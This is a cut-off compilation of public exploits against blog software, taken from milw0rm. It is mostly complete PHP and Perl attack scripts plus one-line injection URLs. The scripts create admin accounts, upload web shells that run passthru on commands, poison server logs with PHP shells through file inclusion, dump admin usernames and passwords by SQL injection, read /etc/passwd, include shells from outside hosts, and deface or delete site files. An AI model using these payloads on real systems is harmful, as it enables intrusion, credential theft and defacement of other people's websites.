HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"666999")) { echo "Exploit succeeded...\r\n"; $temp=explode("666999",$html); die("\r\n".$temp[1]."\r\n"); } echo 'Step 1 - Creating New User (Name: Piggy_Marty Pwd: DAFORNO_IMPERAT)..'; //Retrieving the "confirmation" code $packet ="GET ".$p."register.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); preg_match('#<b>([a-zA-Z0-9]+?)</b><input name="rand" type="hidden" value="([a-zA-Z0-9]+?)" />#is', $html, $fuori); $conf_code = $fuori[1]; $rand_code = $fuori[2]; //Doing the registration $data="rand=$rand_code&val=$conf_code&username_post=Piggy_Marty&pwd1_post=DAFORNO_IMPERAT&pwd2_post=DAFORNO_IMPERAT&name_post=Piggy_Marty&[email protected]"; $packet="POST ".$p."register.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: localhost\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(1); echo 'Step 2 - Promoting Piggy_Marty to admin level..'; $data="type_post=admin&username_post=Piggy_Marty"; $packet="POST ".$p."cp_memberedit.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: localhost\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(1); echo 'Step 3 - Uploading Shell Creator..'; $data="-----------------------------7d529a1d23092a\r\n"; $data.="Content-Disposition: form-data; name=\"image\"; filename=\"piggy_marty_creator.php\"\r\n"; $data.="Content-Type:\r\n\r\n"; $data.="<?php \$fp=fopen('piggy_marty.php','w'); fputs(\$fp,'<?php error_reporting(0); set_time_limit(0); if (get_magic_quotes_gpc()) { \$_GET[cmd]=stripslashes(\$_GET[cmd]); } echo 666999; passthru(\$_GET[cmd]); echo 666999; ?>'); fclose(\$fp); chmod('piggy_marty.php',777); ?>\r\n"; $data.='-----------------------------7d529a1d23092a Content-Disposition: form-data; name="title" Not so good if you see this.. -----------------------------7d529a1d23092a Content-Disposition: form-data; name="post" An Exploit has attacked your site.. contact [email protected] for more details -----------------------------7d529a1d23092a-- '; $packet="POST ".$p."main.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."/\r\n"; $packet.="Cookie: Lightblog_username=Piggy_Marty&Lightblog_password=DAFORNO_IMPERAT\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(1); echo 'Step 4 - Executing Creator..'; $packet ="GET ".$p."images/piggy_marty_creator.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); sleep(1); echo "Step 5 - Execute Commands..\r\n"; $packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"666999")) { echo "Exploit succeeded...\r\n"; $temp=explode("666999",$html); die("\r\n".$temp[1]."\r\n"); } # Coded With BH Fast Generator v0.1 ?> # milw0rm.com [2007-10-09] Furkan Taştan Blog SQL Injection JBlog 1.0 SQL Injection PHP: ################################################## # Script....................................: JBlog ver 1.0 # Script Site...........................: http://www.jmuller.net/jblog/index.php # Vulnerability........................: Remote SQL injection Exploit # Access..................................: Remote # level......................................: Dangerous # Author..................................: S4mi # Contact.................................: S4mi[at]LinuxMail.org ################################################## #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 ..... # ################################################## #Vuln : #http://127.0.0.1/jblog/index.php?id=[SQL] #http://127.0.0.1/jblog/admin/modifpost.php?id=[SQL] (shoud have access to admin area "use my last JBlog Xploit") #Probably Other files are affected #************************************* #Usage : C:\Xploit.pl 127.0.0.1 /Jblog/ #Result Screen Shout : #************************************* # Connecting ...[OK] # Sending Data ...[OK] # # + Exploit succeed! Enjoy. # + ---------------- + # + Password: e10adc3949ba59abbe56e057f20f883e # + Username: admin ################################################### #!/usr/bin/perl use IO::Socket ; &header(); &usage unless(defined($ARGV[0] && $ARGV[1])); $host = $ARGV[0]; $path = $ARGV[1]; syswrite STDOUT ,"\n Connecting ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n Unable to connect to $host\n" unless($sock); syswrite STDOUT, "[OK]"; $inject = "union%20select%200,login,pass,3,4,5%20from%20auteur%20WHERE%20id=1/*"; syswrite STDOUT ,"\n Sending Data ..."; print $sock "GET $path/index.php?id='$inject HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Connection: Close\n\n"; syswrite STDOUT ,"[OK]\n\n"; while($answer = <$sock>){ if ($answer =~ /class='titre'>(.*?)<\/span>/){ print "+ Exploit succeed! Enjoy.\n"; print "+ ---------------- +\n"; print "+ Password: $1\n"; } if($answer =~ / '(.*?)' /){ print "+ Username: $1\n"; } } sub usage{ print "\nUsage : perl $0 host /path/ "; print "\nExemple : perl $0 www.victim.com /JBlog/\n"; exit(0); } sub header(){ print q( ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Script.................: JBlog ver 1.0 Script Site............: http://www.jmuller.net/jblog/index.php Vulnerability..........: Remote SQL injection Exploit Access.................: Remote level..................: Dangerous Author.................: S4mi Contact................: S4mi[at]LinuxMail.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ); } # milw0rm.com [2007-09-14]
SimpleBlog 3.0 SQL Injection PHP: #!/usr/bin/perl #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# # SimpleBlog 3.0 [ comments_get.asp ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by MurderSkillz # # # # shoutz: z3r0, kat, str0ke, rezen, fish, wicked, clorox, # # Canuck, a59, sess, bernard, + the rest of g00ns # # [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net] # #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# use LWP::UserAgent; $host = @ARGV[0]; $ua = LWP::UserAgent->new; my $inject ='comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS'; if (@ARGV < 1){&top( );&usage( )} elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );} else { &xpl( ) } sub xpl( ) { &top( ); print "\n [~] Connecting\n"; $res = $ua->get("http://$host/$inject"); $con = $res->content; print "\n [~] Checking for admin info\n"; if ($con =~ /<strong>([-_+.\w]{1,15})<\/strong>/gmi) { print "\n\t [+] Admin user: $1\n"; } if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi) { print "\n\t [+] Admin password: $2\n"; print "\n [+] Complete\n"; } else { print "\n [-] Unable to retrieve admin info\n"; exit(0); } } sub top( ) { print q { ################################################################## # SimpleBlog 3.0 [ comments_get.asp ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by MurderSkillz # ################################################################## } } sub usage( ) { print "\n Usage: perl simpleblog3.pl <host>\n"; print "\n Example: perl simpleblog3.pl www.example.com/path\n\n"; exit(0); } # milw0rm.com [2007-07-28] BlogSite Professional SQL Injection Code: http://www.server.com/index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/* 6ALBlog SQL Injection Code: http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,concat(user,0x3a,pass),3,4,5,6,7%20from%20blog_users/* BlogMe 3.0 SQL Injection Code: /blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin Archangel Weblog 0.90.02 Local File Inclusion Code: http://Target.com/blog/index.php?index=../../../../etc/passwd%00 sBLOG 0.7.3 Beta Local File Inclusion PHP: #!/usr/bin/perl # sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit # D.Script: http://sourceforge.net/projects/sblog/ # V.Code: # if(isset($conf_lang_default) && file_exists('lang/' . $conf_lang_default . '.php')) # require('lang/' . $conf_lang_default . '.php'); # Discovered & Coded by : GolD_M = [Mahmood_ali] # Contact:[email protected] # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group # Thanx : w4ck1ng.com & cyb3rt & 020 use IO::Socket; use LWP::Simple; #ripped @apache=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. /../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); if (@ARGV < 3) { print " =============================================================== # sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit # # Gold.pl [Victim] / (apachepath) # # Ex: Gold.pl [Victim] / ../logs/error.log # =============================================================== # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group # # Thanx : w4ck1ng.com & cyb3rt & 020 # =============================================================== "; exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print "Code is injecting in logfiles...\n"; $CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n"; print $socket "GET ".$path.$CODE." HTTP/1.1\r\n"; print $socket "user-Agent: ".$CODE."\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); print "Write END to exit!\n"; print "If not working try another apache path\n\n"; print "[shell] ";$cmd = <STDIN>; while($cmd !~ "END") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n"; #now include parameter print $socket "GET ".$path."/inc/lang.php?conf_lang_default=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; while ($raspuns = <$socket>) { print $raspuns; } print "[shell] "; $cmd = <STDIN>; } # milw0rm.com [2007-03-29] WBBlog (XSS/SQL) Code: index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/* WebLog File Disclosure BP Blog 7.0 SQL Injection Code: http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1 Админка: b2 Blog <= 0.5 Remote File Include Code: http://www.site.***/[path]/b2verifauth.php?index=http://mdxshell.txt? BLOG:CMS <= 4.1.3 Remote Inclusion Code: http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin WikyBlog 1.3.2 Local File Inclusion PHP: ################################################################################################# # r0ut3r Presents... # # # # Another r0ut3r discovery! # # writ3r [at] gmail.com # # # # WikyBlog Local File Inclusion Exploit # ################################################################################################# # Software: WikyBlog 1.3 # # # # Vendor: http://www.wikyblog.com/ # # # # Released: 2006/12/01 # # # # Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) # # # # Note: The information provided in this document is for WikyBlog administrator # # testing purposes only! # # # # This exploit makes use of a local file inclusion exploit in # # WikyBlog to allow command execution. Firstly it locates an # # access_log, or error_log then it inserts a PHP Shell into # # the log file and returns a link for command execution. # # # # include/WBmap.php?l=file_to_include%00 # # register_globals being on does not affect this vulnerability # ################################################################################################# use IO::Socket; use Switch; $port = "80"; # connection port $target = @ARGV[0]; # localhost $folder = @ARGV[1]; # /wikyblog/ sub Header() { print q {################################################################################################# # r0ut3r Presents... # # # # Another r0ut3r discovery! # # writ3r [at] gmail.com # # # # WikyBlog Local File Inclusion Exploit # ################################################################################################# }; } sub Usage() { print q {Usage: wikyblogxpl1.3.pl [target] [folder] Example: wikyblogxpl1.3.pl localhost /wikyblog/ }; exit(); } Header(); if (!$target || !$folder) { Usage(); } # log list taken from Kacper's http://www.milw0rm.com/exploits/2253 @paths=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../../../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); print "[+] Attempting to locate log file\n"; $log = ""; foreach $path (@paths) { $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n"; print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n"; print $sock "Host: $target\n"; print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $sock "Accept: text/html\n"; print $sock "Connection: close\n\n\r\n"; #locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253 $out = ""; while ($answer = <$sock>) { $out.=$answer; } close($sock); if ($out =~ m/_exppl_(.*?)_exppl_/ms) { print "[+] Log file found! [".$path."] \n"; $log = $path; } } if ($log eq "") { print "[-] Log file not found. Exiting...\n"; exit(); } print "[+] Inserting PHP Shell into logs\n"; $code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>"; $xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n"; print $xpl "GET /".$code." HTTP/1.1\n"; print $xpl "Host: $target\n"; print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $xpl "Accept: text/html\n"; print $xpl "Connection: close\n\n\r\n"; print "[+] Sent code...\n"; print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00"; # milw0rm.com [2006-12-01] SimpleBlog <= 2.3 SQL Injection Code: http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users BrewBlogger 1.3.1 SQL Injection PHP: #!/usr/bin/perl ########################################################################################### #Target: # # BewBlogger 1.3.1 # http://brewblogger.zkdigital.com # #Vulnerability: # # SQL Injection # #Description: # # BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php. # Since each user entry contains an auto-incrementing ID number, it is possible to # enumerate all user names and passwords stored in the 'users'database by iterating # through every possible ID number. # #Vulnerable Code (truncated): # # $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']); # $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log); # $log = mysql_query($query_log, $brewing) or die(mysql_error()); # #Usage: # This script will produce a URL which will reveal the user name and password for # the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for # the first user). The user name will be listed as "Method:" under 'General # Information', and the password will be listed as "Cost:". # #Usage: # ./brewblog.pl <domain name + path> [user id] # #Examples: # # ./brewblogger.pl www.beerblog.com 3 # ./brewblogger.pl www.mysite.com/beerblog # #Google Dork: # # intext:"BrewBlogger for PHP" # #Discovery/code: # # Craig Heffner # heffnercj [at] gmail.com # http://www.craigheffner.com ########################################################################################### print ' ########################################### # BrewBlogger 1.3.1 SQL Injection Exploit # # # # Discovered and coded by: Craig Heffner # ########################################### '; if(!$ARGV[0] || $ARGV[0] eq "-h"){ print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n"; exit; } if(!$ARGV[1]){ $id = 2; } else { $id = $ARGV[1]; } $url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+"; $a = 1; while($a < 211){ if($a == 8){ $string .= "user_name,"; } elsif($a == 9){ $string .= "password,"; } elsif($a == 210){ $string .= "1"; } else { $string .= "1,"; } $a++; } print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n"; exit; # milw0rm.com [2006-11-10] IrayoBlog 0.2.4 Remote File Include Code: http://[target]/[path]/inc/irayofuncs.php?irayodirhack=http://evilsite.com/shell? vBlog / C12 0.1 Remote File Include
Light Blog Multiple Vulnerabilities PHP: #!/usr/bin/php -q -d short_open_tag=on <? echo "\r\n"; echo "Light Blog Multiple Vulnerabilities Exploit\r\n"; echo "by BlackHawk <[email protected]>\r\n"; echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n"; if ($argc<4) { echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n"; echo "Host: target server (ip/hostname)\r\n"; echo "Path: path to LightBlog\r\n"; echo "AttackType: 1 - Create New Post (Title must be of one word)\r\n"; echo " |-> Related: Title Post\r\n"; echo " |-> Es: php ".$argv[0]." localhost /blog/ 1 Hacked I Got You\r\n\r\n"; echo " 2 - Deface Blog (With XSS)\r\n"; echo " |-> Related: WebPage\r\n"; echo " |-> Es: php ".$argv[0]." localhost /blog/ 2 http://site.com/\r\n\r\n"; echo " 3 - Deface Blog (Deleting blog.php)\r\n"; echo " |-> Related: NickName\r\n"; echo " |-> Es: php ".$argv[0]." localhost /blog/ 3 BlackHawk\r\n\r\n"; echo ""; echo "\r\n"; echo ""; die; } /* There are some critical vulnerabilities in this quite simple Blog Engine.. 1 - You do not need to know the right password to send a new Post (no cecking); 2 - You can erase (even with mq=on) all file that are stored on the server: [...] $t = stripslashes($t); [...] $fc = fopen ("blog_comments/$t.txt", "w"); fwrite ($fc, ""); [...] 3-Using point No 1 you can do some XSS couse there isn't any anti-Xss code for admins 4-If mq=on than you can deface the site (but no injecting PHP cause < and > are properly parsed) sorry for my bad english, BlackHawk [email protected] */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $attack_type=$argv[3]; $port=80; $proxy=""; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} switch($attack_type) { case 1: //Insert New Post $title=$argv[4]; $message=""; for ($i=5; $i<=$argc-1; $i++){ $message.=" ".$argv[$i]; } $title=urlencode($title); $message=urlencode($message); echo "Attack No 1 - Sending New Post..\r\n"; $data="t=$title"; $data.="&c=$message"; $data.="&Submit=Post"; $packet="POST ".$p."LightBlog/blog_script.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."/blog.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); echo "Ok, Post Sent"; break; case 2: // Deface With XSS $dfc_url=$argv[4]; $deface_url=urlencode("<script>window.location=('$dfc_url')</script>"); echo "Attack No 2 - Sending New Post With XSS..\r\n"; $data="t=$deface_url"; $data.="&c=msg"; $data.="&Submit=Post"; $packet="POST ".$p."LightBlog/blog_script.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."/blog.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); echo "Ok, Post Sent"; break; break; case 3: // Defacing the original blog.php file $nickname=$argv[4]; $packet ="GET ".$p."LightBlog/blog_comments.php?comment=Comment&title=title HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); $temp=explode("name=\"rand\" id=\"rand\" value=\"",$html); $temp2=explode("\"></input>",$temp[1]); $random_code = $temp2[0]; $temp=explode("name=\"rand\" id=\"rand\" value=\"$random_code\"></input>",$html); $temp2=explode(" ",$temp[1]); $small_code = $temp2[0]; $data="t=../../blog.php%00"; $data.="&c=ciao"; $data.="&Submit=Post"; $packet="POST ".$p."/LightBlog/blog_script.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."/blog.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); echo "blog.php File erased\r\n"; // This part will work only if mq=off elsewhere the exploit will only delete blog.php $deface_text=urlencode("|:. $nickname got you! .:"); $signature=urlencode(" BlackHawk And Piggy-Marty Rulez info --> <[email protected]>"); $packet ="GET ".$p."LightBlog/add_comment_script.php?name=$deface_text&comment=$signature&rand=$random_code&val=$small_code&Submit=Submit&title=../../blog.php/%00 HTTP/1.0\r\n"; $packet.="Referer: http://".$host.$path."blog.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); echo "Ok, Blog Defaced"; break; } ?> # milw0rm.com [2006-10-27] Def-Blog <= v1.0.1 SQL Injection OpenDock Easy Blog <=1.4 File Include A-Blog v2.0 Remote File Include Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin PHP: #!/usr/bin/perl # # Affected.scr..: Blog Pixel Motion V2.1.1 # Poc.ID........: 12060927 # Type..........: PHP Code Execution (stripslashes), SQL Injection (urldecode) # Risk.level....: High # Vendor.Status.: Unpatched # Src.download..: www.pixelmotion.org/zip/blog2.1.zip # Poc.link......: acid-root.new.fr/poc/12060927.txt # Credits.......: DarkFig # # print "This exploit is for educational purpose only" x 999; exit; # use LWP::UserAgent; use HTTP::Request::Common; use HTTP::Response; use Getopt::Long; use strict; print STDOUT "\n+", '-' x 60, "+\n"; print STDOUT "| Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin |\n"; print STDOUT '+', '-' x 60, "+\n"; my($host,$path,$proxh,$proxu,$proxp,$choice,$cmd,$res,$re); my $opt = GetOptions( 'host=s' => \$host, 'path=s' => \$path, 'proxh=s' => \$proxh, 'proxu=s' => \$proxu, 'proxp=s' => \$proxp, 'choice=s' => \$choice); if(!$host) { print STDOUT "| Usage: ./zz.pl --host=[www] --path=[/] --choice=[0] |\n"; print STDOUT "| [Choice.] 1=PHP_Code_Execution 2=Create_Admin |\n"; print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n"; print STDOUT '+', '-' x 60, "+\a\n"; exit(1); } if($host !~ /http/) {$host = 'http://'.$host;} if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';} if(!$path) {$path = '/';} if(!$choice) {$choice = 2;} my $ua = LWP::UserAgent->new(); $ua->agent('0xzilla'); $ua->timeout(30); $ua->proxy(['http'] => $proxh) if $proxh; $re->proxy_authorization_basic($proxu, $proxp) if $proxp; if($choice == 1) { $re = POST $host.$path.'config.php', [ 'nom_blog' => '"; $shcode = chr(0x69).chr(0x66).chr(0x28).chr(0x69).chr(0x73).chr(0x73).chr(0x65); $shcode .= chr(0x74).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54); $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D); $shcode .= 